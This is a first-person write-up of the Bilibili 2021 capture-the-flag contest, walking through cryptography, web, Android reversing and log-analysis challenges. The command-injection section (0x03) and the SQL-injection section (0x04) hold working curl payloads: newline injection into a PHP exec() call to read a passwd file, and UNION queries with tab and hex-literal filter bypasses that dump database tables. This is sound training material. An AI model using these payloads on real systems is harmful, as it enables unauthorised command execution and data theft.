Bilibili 2021 CTF

Today, October 24, is the annual Programmer’s Day. Here is a brief record of how I solved the second part of the Bilibili 2021 Security Technical Match (which I would rather call a Capture the Flag challenge).

0x01

Let’s start with the first challenge. The page shows the keyword “解密” (decryption), the plain string happy_1024_2233, and, after a colon, two lines of hex that add up to 48 bytes. We join the two hex lines, convert them to binary with xxd, and pipe the result into openssl to decrypt it with the aes-128-ecb cipher and no padding. Note that the -K argument expects the key in hex:

echo -n 'e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156' | xxd -r -p | openssl aes-128-ecb -nopad -d -K "$(echo -n 'happy_1024_2233' | xxd -p)"

Finally we got the first flag:

# a1cd5f84-27966146-3776f301-64031bb9
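
As a sanity check on the sizes in the command above, here is a small Python sketch. It does not decrypt anything, and the variable names are my own. The 15-character string gives 30 hex digits, one byte short of an AES-128 key; as far as I know, openssl pads a short -K value with zero bytes and prints a warning, which is the assumption the `padded_key` line mimics.

```python
# Sizes involved in the openssl command (sketch only, no decryption).
key_text = "happy_1024_2233"
cipher_hex = (
    "e9ca6f21583a1533d3ff4fd47ddc463c"
    "6a1c7d2cf084d3640408abca7deabb96"
    "a58f50471171b60e02b1a8dbd32db156"
)

key_hex = key_text.encode("ascii").hex()   # same digits as `xxd -p`
cipher = bytes.fromhex(cipher_hex)         # same bytes as `xxd -r -p`

# Assumption: a short -K value is right-padded with zero bytes to 16 bytes.
padded_key = key_text.encode("ascii").ljust(16, b"\x00")

# Number of hex digits in the key, ciphertext bytes, and 16-byte AES blocks.
print(len(key_hex), len(cipher), len(cipher) // 16)
print(padded_key.hex())
```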

0x02

The second challenge points to a user management website, https://security.bilibili.com/sec1024/q. The site is built with Vue and webpack, and its source maps let us read the original source code. Something interesting turns up in webpack:///src/views/home.vue:

...
export default {
  // 36c7a7b4-cda04af0-8db0368d-b5166480
  data() {
    return {
      token: '',
      user_name: '',
      user_role: '',
    }
  }, ...
}
...

On a guess, we submit the contents of this comment, and it is accepted as the second flag:

# 36c7a7b4-cda04af0-8db0368d-b5166480
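
Searching a source map for such comments can be automated. The sketch below assumes the map is a version 3 source map that embeds the original files in its `sourcesContent` array; `find_flags` and the tiny `demo_map` are made up for illustration and stand in for the real .js.map file.

```python
import json
import re

# Flags in this write-up look like four groups of 8 hex digits joined by dashes.
FLAG_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{8}){3}")

def find_flags(source_map_text):
    """Return (source path, flag-like string) pairs found in a v3 source map."""
    source_map = json.loads(source_map_text)
    sources = source_map.get("sources", [])
    contents = source_map.get("sourcesContent", [])
    hits = []
    for path, content in zip(sources, contents):
        # An entry may be null when the original file was not embedded.
        for match in FLAG_RE.findall(content or ""):
            hits.append((path, match))
    return hits

# Hand-made source map used only to exercise the function.
demo_map = json.dumps({
    "version": 3,
    "sources": ["webpack:///src/views/home.vue"],
    "sourcesContent": ["export default {\n// 36c7a7b4-cda04af0-8db0368d-b5166480\n}"],
})
print(find_flags(demo_map))
```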

0x03

The third challenge gives us the keyword PHP and a zip file that contains a file named eval.php. As the comment in the file says, the same script is also reachable at the pro URL:

<?php
/*
bilibili- ( ゜- ゜)つロ 乾杯~
uat: http://192.168.3.2/uat/eval.php
pro: http://security.bilibili.com/sec1024/q/pro/eval.php
*/
$args = @$_GET['args'];
if (count($args)>3) {
    exit();
}
for ($i=0; $i<count($args); $i++){
    if (!preg_match('/^\w+$/', $args[$i])) {
        exit();
    }
}
// todo: other filter
$cmd = "/bin/2233 ".implode(" ", $args);
exec($cmd, $out);
for ($i=0; $i<count($out); $i++){
    echo($out[$i]);
    echo('<br>');
}
?>

There are two filters on args. The first rejects more than three arguments. The second, the regular expression /^\w+$/, only accepts letters, digits, and underscores. Note, however, that $ also matches just before a trailing newline, so a word that ends with a linefeed (%0A when URL-encoded) still passes.
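
The newline behaviour is easy to reproduce. The sketch below uses Python’s re module, which treats $ the same way as PHP’s preg_match does here (Python’s \w is a little broader than PCRE’s by default, which does not matter for this input). `passes_filter` is a hypothetical stand-in for the two checks in eval.php, not the server’s code.

```python
import re

FILTER = re.compile(r"^\w+$")   # same pattern as in eval.php

def passes_filter(args):
    """Mimic the two checks in eval.php: at most 3 args, each matching the pattern."""
    return len(args) <= 3 and all(FILTER.match(a) for a in args)

args = ["0\n", "ls"]            # "0%0a" after URL decoding, followed by "ls"
print(passes_filter(args))

# The string handed to exec(): the embedded newline splits it into two commands.
cmd = "/bin/2233 " + " ".join(args)
print(repr(cmd))
```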

That makes it easy to escape from /bin/2233: the newline ends the first shell command, and whatever follows runs as a new one. The bin path and the response seen in the browser suggest a web server running Tengine on Linux, so we simply try the Linux command ls to list files:

curl -X GET -L 'http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=0%0a&args[]=ls'

# 1.txt<br>
# passwd<br>
# data<br>
# config<br>

Just cat the passwd file:

curl -X GET -L 'http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=0%0a&args[]=cat&args[]=passwd'

The response contains the third flag:

# 9d3c3014-6c6267e7-086aaee5-1f18452a

0x04

The fourth challenge points to the same website as the second one, and the hint tells us to use SQL injection. The vulnerable part is that viewing 用户信息 (user information) or 日志信息 (log information) sends a POST request under https://security.bilibili.com/sec1024/q/admin/api/v1/ with this request body:

{"user_id":"","user_name":"","action":"","page":1,"size":20}

There are two different APIs, so we test each of them for injection. The injectable one ends with log/list, and we find that the filter does not reject the characters \t and \n or the comment /**/, so any of them can be used where a space would normally go:

curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,3#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"3","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}

Next we want the table names. Replace the last selected value (the literal 3) with group_concat(table_name) and read from information_schema.tables:

curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,group_concat(table_name)\tfrom\tinformation_schema.tables\twhere\ttable_schema=database()#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"flag,log,user","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}

Next we list the columns of the flag table. The quotes ' and " seem to be rejected by the filter, so we write flag as a hexadecimal literal (0x666c6167) to bypass it:

curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,group_concat(column_name)\tfrom\tinformation_schema.columns\twhere\ttable_schema=database()\tand\ttable_name=0x666c6167#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"id","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}
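
The two bypasses used so far, tabs instead of spaces and a hex literal instead of a quoted string, can be generated rather than typed by hand. This is only a sketch: `hex_literal` and `build_body` are hypothetical helper names, and the body layout is copied from the request shown earlier.

```python
import json

def hex_literal(text):
    """Encode a string as a MySQL hex literal so that no quotes are needed."""
    return "0x" + text.encode("utf-8").hex()

def build_body(sql):
    """Swap spaces for tabs and wrap the payload in the JSON request body."""
    payload = sql.replace(" ", "\t")
    return json.dumps({"user_id": "", "user_name": payload,
                       "action": "", "page": 1, "size": 20})

sql = ("true union select database(),user(),1,2,group_concat(column_name) "
       "from information_schema.columns where table_schema=database() "
       "and table_name=" + hex_literal("flag") + "#")

# json.dumps escapes each tab as \t, matching the curl payloads.
print(build_body(sql))
```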

The table has only one column, id, so we can read it directly:

curl -X POST -L 'https://security.bilibili.com/sec1024/q/admin/api/v1/log/list' \
-H 'Content-Type: application/json' \
-d '{"user_id":"","user_name":"true\tunion\tselect\tdatabase(),user(),1,2,group_concat(id)\tfrom\tflag#","action":"","page":1,"size":20}'

# {"code":200,"data":{"res_list":[{"action":"2","id":"q","time":"3d5dd579-0678ef93-18b70cae-cabc5d51","user_id":"[email protected]","user_name":"1"}],"total":1},"msg":""}

Finally, the fourth flag is here:

# 3d5dd579-0678ef93-18b70cae-cabc5d51

0x05

The title of this challenge tells me that it is about reverse engineering an APK file. There are several ways to decompile an APK; here I use JADX:

jadx test.apk -d 'test' -v

Let’s take a look at the decompiled file’s structure:

tree test -L 2

# test
# ├── resources
# │   ├── AndroidManifest.xml
# │   ├── META-INF
# │   ├── classes.dex
# │   ├── lib
# │   └── res
# └── sources
#     ├── android
#     ├── androidx
#     └── com

The main activity, which is the entry point of the app, is in test/sources/com/example/test/MainActivity.java. It contains some useful information:

...
public void onClick(View view) {
    String obj = ((EditText) MainActivity.this.findViewById(R.id.TextAccount)).getText().toString();
    String obj2 = ((EditText) MainActivity.this.findViewById(R.id.TextPassword)).getText().toString();
    byte[] b = Encrypt.b(Encrypt.a(obj.getBytes(), 3));
    byte[] b2 = Encrypt.b(Encrypt.a(obj2.getBytes(), 3));
    byte[] bArr = {89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117, 79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61};
    if (!Arrays.equals(b, new byte[]{78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117, 78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61}) || !Arrays.equals(b2, bArr)) {
        Toast.makeText(MainActivity.this, "还差一点点~~~", 1).show();
    } else {
        Toast.makeText(MainActivity.this, "bilibili- ( ゜- ゜)つロ 乾杯~", 1).show();
    }
}
...

Then take a look at the Encrypt class in the source file test/sources/com/example/test/Encrypt.java:

package com.example.test;
import android.util.Base64;
public class Encrypt {
    public static byte[] a(byte[] bArr, int i) {
        if (bArr == null || bArr.length == 0) {
            return null;
        }
        int length = bArr.length;
        for (int i2 = 0; i2 < length; i2++) {
            bArr[i2] = (byte) (bArr[i2] ^ i);
        }
        return bArr;
    }
    public static byte[] b(byte[] bArr) {
        return Base64.encode(bArr, 2);
    }
}

We can see that the a method XORs every byte with the key i, and that the b method is Base64 encoding. Reversing the two steps (Base64 decode first, then XOR with the same key) gives us a decrypt function:

static void Decrypt(byte[] bArr, int i) {
    byte[] bArrDecoded = Base64.getDecoder().decode(bArr);
    int length = bArrDecoded.length;
    for (int i2 = 0; i2 < length; i2++) {
        bArrDecoded[i2] = (byte) (bArrDecoded[i2] ^ i);
    }
    System.out.println(new String(bArrDecoded));
}

We then call that function to decrypt the account and the password:

byte[] bArrAccount = {78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117, 78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61};
Decrypt(bArrAccount, 3);
byte[] bArrPassword = {89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117, 79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61};
Decrypt(bArrPassword, 3);

// 516834cc-50e448af
// bcf9ed53-9ae4328e
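
As a cross-check, the same two steps can be written in a few lines of Python. This is an equivalent sketch rather than code from the app; `decrypt` is my own helper name, and the byte arrays are copied from MainActivity.java.

```python
import base64

def decrypt(data, key):
    """Undo Encrypt.b (Base64) and then Encrypt.a (XOR every byte with key)."""
    decoded = base64.b64decode(bytes(data))
    return bytes(b ^ key for b in decoded).decode("ascii")

account = [78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117,
           78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61]
password = [89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117,
            79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61]

# Account first, then password, joined by a dash.
print(decrypt(account, 3) + "-" + decrypt(password, 3))
```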

Joining the account and the password gives the final flag:

# 516834cc-50e448af-bcf9ed53-9ae4328e

0x06

This challenge uses the same APK as the previous one. Inspecting MainActivity.java again, we find that it loads a native library through JNI:

...
static {
    System.loadLibrary("Mylib");
}
...

The shared library is libMylib.so, located in test/resources/lib and built for four different architectures. We can use objdump to list its symbols:

objdump -d x86_64/libMylib.so -T | less

It prints the dynamic symbol table:

libMylib.so:          file format elf64-x86-64

DYNAMIC SYMBOL TABLE:
0000000000000000 DF *UND* 0000000000000000 __cxa_atexit
0000000000000000 DF *UND* 0000000000000000 __cxa_finalize
0000000000000000 DF *UND* 0000000000000000 __stack_chk_fail
0000000000000000 DF *UND* 0000000000000000 __strlen_chk
0000000000000000 DF *UND* 0000000000000000 __system_property_get
0000000000000000 DF *UND* 0000000000000000 __vsprintf_chk
0000000000000000 DF *UND* 0000000000000000 fclose
0000000000000000 DF *UND* 0000000000000000 fopen
0000000000000000 DF *UND* 0000000000000000 fputs
0000000000000000 DF *UND* 0000000000000000 fwrite
0000000000000000 DF *UND* 0000000000000000 memcpy
0000000000001620 g DF .text 0000000000000051 EE
0000000000000c70 g DF .text 00000000000008b6 ET
0000000000001720 g DF .text 00000000000002ce all
0000000000001ac0 g DF .text 0000000000000005 i
0000000000004058 g D *ABS* 0000000000000000 _edata
0000000000004058 g D *ABS* 0000000000000000 _end
0000000000001530 g DF .text 00000000000000e8 EF
0000000000000b60 g DF .text 0000000000000019 EI
0000000000000b80 g DF .text 00000000000000eb EU
0000000000004000 g DO .data 0000000000000040 PADDING
0000000000004058 g D *ABS* 0000000000000000 __bss_start
0000000000001680 g DF .text 0000000000000054 ED
0000000000001ad0 g DF .text 000000000000009a JNI_OnLoad
00000000000016e0 g DF .text 0000000000000025 f_e
0000000000001710 g DF .text 0000000000000005 system
...

Note the imported fclose, fputs, fwrite, and fopen functions, which suggest that the library performs file operations. There is also a JNI_OnLoad function, which the Android runtime calls when the library is loaded. For further investigation, I use the Ghidra decompiler to get C-like pseudocode, and find that the all function does most of the work:

void all(JNIEnv *env) {
    ...
    __system_property_get("ro.product.cpu.abi",local_40);
    __system_property_get("ro.build.version.release",local_60);
    if ((local_40[0] == 0x363878) && (local_60[0] == 0x39)) {
        pFVar1 = fopen("/data/2233","r");
        ...
    }
    ...
    do {
        sprintf((char *)&local_20,(uint)pFVar1,format,(uint)*(byte *)((int)&local_88 + iVar3));
        sprintf(local_164,(uint)pFVar1,format,(uint)*(byte *)((int)&local_98 + iVar3));
        fputs((char *)&local_20,__stream);
        pFVar1 = __stream;
        fputs(local_164,__stream);
        iVar3 = iVar3 + 1;
    } while (iVar3 != 0);
    fwrite("-----------\n",0xc,1,__stream);
    ...
}

We can infer that the all function reads two Android system properties (the kind found in build.prop): ro.product.cpu.abi and ro.build.version.release. If the first equals x86 (0x363878, the bytes of the string in reversed, little-endian order), the second equals 9 (0x39), and the app can access the file /data/2233, then the text written to that file should be related to the flag. The same check in the disassembly looks like this:

...
00011416 83 c4 10 ADD ESP,0x10
00011419 81 bc 24 CMP dword ptr [ESP + local_40],0x363878
50 01 00
00 78 38
00011424 0f 85 0f JNZ LAB_00011439
00 00 00
0001142a 66 83 bc CMP word ptr [ESP + local_60],0x39
24 30 01
00 00 39
00011433 0f 85 00 JNZ LAB_00011439
00 00 00
.LAB_00011439 XREF[2]: 00011424(j), 00011433(j)
00011439 83 ec 08 SUB ESP,0x8
0001143c 8d 83 d8 LEA EAX,[EBX + 0xffffe8d8]=>DAT_00011890 = 72h r
e8 ff ff
00011442 8d b3 da LEA ESI,[EBX + 0xffffe8da]=>s_/data/2233_00011892 = "/data/2233"
e8 ff ff
...
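
The two constants in the comparison can be decoded with a short Python sketch; the variable names are mine. Packing the dword in little-endian order, as an x86 CPU stores it, gives back the characters that the property value is compared against.

```python
import struct

abi_check = 0x363878      # constant compared against ro.product.cpu.abi
release_check = 0x39      # constant compared against ro.build.version.release

# x86 is little-endian, so the lowest byte of the dword is the first character.
abi_bytes = struct.pack("<I", abi_check)

print(abi_bytes)            # four bytes: the ABI string plus its NUL terminator
print(chr(release_check))   # the single character of the release string
```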

I tried adding a LAB_00011439 label inside the if block and pointing the JNZ at that label, so that the block runs even when the condition is false, together with permission requests in AndroidManifest.xml:

<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

Then I re-signed the APK and installed it on my x86-64 QEMU Android VM. Unfortunately the app crashed unexpectedly, so this approach does not work. Patching the shared library is not as easy as I thought: it may contain verification checks, and simply changing the assembly just broke it.

Rather than using Unicorn or a similar emulator, the easiest way is to use a real rooted Android device. I don’t have one at the moment, so I will come back to this challenge later.

0x07

As its description says, this is a data analysis challenge, so we start by downloading the log file. First, fix up evil-log.log so that it is valid JSON, then parse it with Python:

import json

# Load the repaired log file; it is expected to be a JSON array of records.
with open('evil-log.log') as f:
    raw = json.load(f)
print(raw[0])

The printed data structure is:

{
'@timestamp': '2021-10-18T02:00:04+0000',
'bytes_sent': '10346',
'cdn_scheme': 'https',
...
'http_path': '/s/video/BV1Jt4y1D7jJ',
'http_user_agent': '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
'request_length': '582',
'request_time': '0.129',
...
'status': '200',
'upstream_status': '200',
'x_backend_bili_real_ip': 'gg.cej.hd.bii'
}

Then do some simple analysis to find the most frequent IPs:

dict_by_ip = dict()
for i in raw:
    if i['x_backend_bili_real_ip'] not in dict_by_ip:
        dict_by_ip[i['x_backend_bili_real_ip']] = 1
    else:
        dict_by_ip[i['x_backend_bili_real_ip']] += 1

sorted_ip = { k : v for k, v in sorted(dict_by_ip.items(), key = lambda x : x[1], reverse = True) }
print(sorted_ip)

Then analyze the user agents (UA) in the same way:

dict_by_ua = dict()
for i in raw:
    if i['http_user_agent'] not in dict_by_ua:
        dict_by_ua[i['http_user_agent']] = 1
    else:
        dict_by_ua[i['http_user_agent']] += 1

sorted_ua = { k : v for k, v in sorted(dict_by_ua.items(), key = lambda x : x[1], reverse = True) }
print(sorted_ua)

For further analysis, I would look at how the request frequency of different IPs and UAs is distributed over time, find a period of peak requests and the IPs that were active in it, then sort those IPs by request frequency and look for correlations. Suppose that, within this period, an IP makes n requests, of which P are normal (status 200) and Q are abnormal, and that the richness of the requested paths is V. With weights a through e still to be chosen, a score F of roughly the following form could then serve as the basis for the ordering:

$$
F=an-bP+cQ-dV+eQV
$$
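
A minimal sketch of this scoring idea follows. It is not something I ran against the challenge data. It assumes the records have already been narrowed down to the peak period, takes the richness V to be the number of distinct paths an IP requested, and uses weights of 1.0 purely as placeholders; `score_ips` and the three sample records are invented for illustration.

```python
from collections import defaultdict

def score_ips(records, a=1.0, b=1.0, c=1.0, d=1.0, e=1.0):
    """Compute F = a*n - b*P + c*Q - d*V + e*Q*V for every IP in records."""
    stats = defaultdict(lambda: {"n": 0, "P": 0, "Q": 0, "paths": set()})
    for r in records:
        s = stats[r["x_backend_bili_real_ip"]]
        s["n"] += 1
        if r["status"] == "200":
            s["P"] += 1          # normal request
        else:
            s["Q"] += 1          # abnormal request
        s["paths"].add(r["http_path"])
    scores = {}
    for ip, s in stats.items():
        v = len(s["paths"])      # assumption: richness = number of distinct paths
        scores[ip] = a * s["n"] - b * s["P"] + c * s["Q"] - d * v + e * s["Q"] * v
    # Highest score first.
    return sorted(scores.items(), key=lambda kv: kv[1], reverse=True)

# Invented sample records using the field names from the log.
sample = [
    {"x_backend_bili_real_ip": "ip-a", "status": "200", "http_path": "/s/video/1"},
    {"x_backend_bili_real_ip": "ip-b", "status": "404", "http_path": "/admin"},
    {"x_backend_bili_real_ip": "ip-b", "status": "403", "http_path": "/login"},
]
print(score_ips(sample))
```

The weights would have to be tuned against the data before the ranking means anything.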

Real scenarios are often more complex. I did not analyze the data any further, so I only got a partial score for this challenge. I also read a good article, How to analyze log data with Python and Apache Spark. If I have more spare time, I will try this challenge again.

I am not familiar with data analysis or the algorithmic models used for it. Applying machine learning to it also seems interesting, so there is still a lot for me to learn. That’s all, thanks for reading.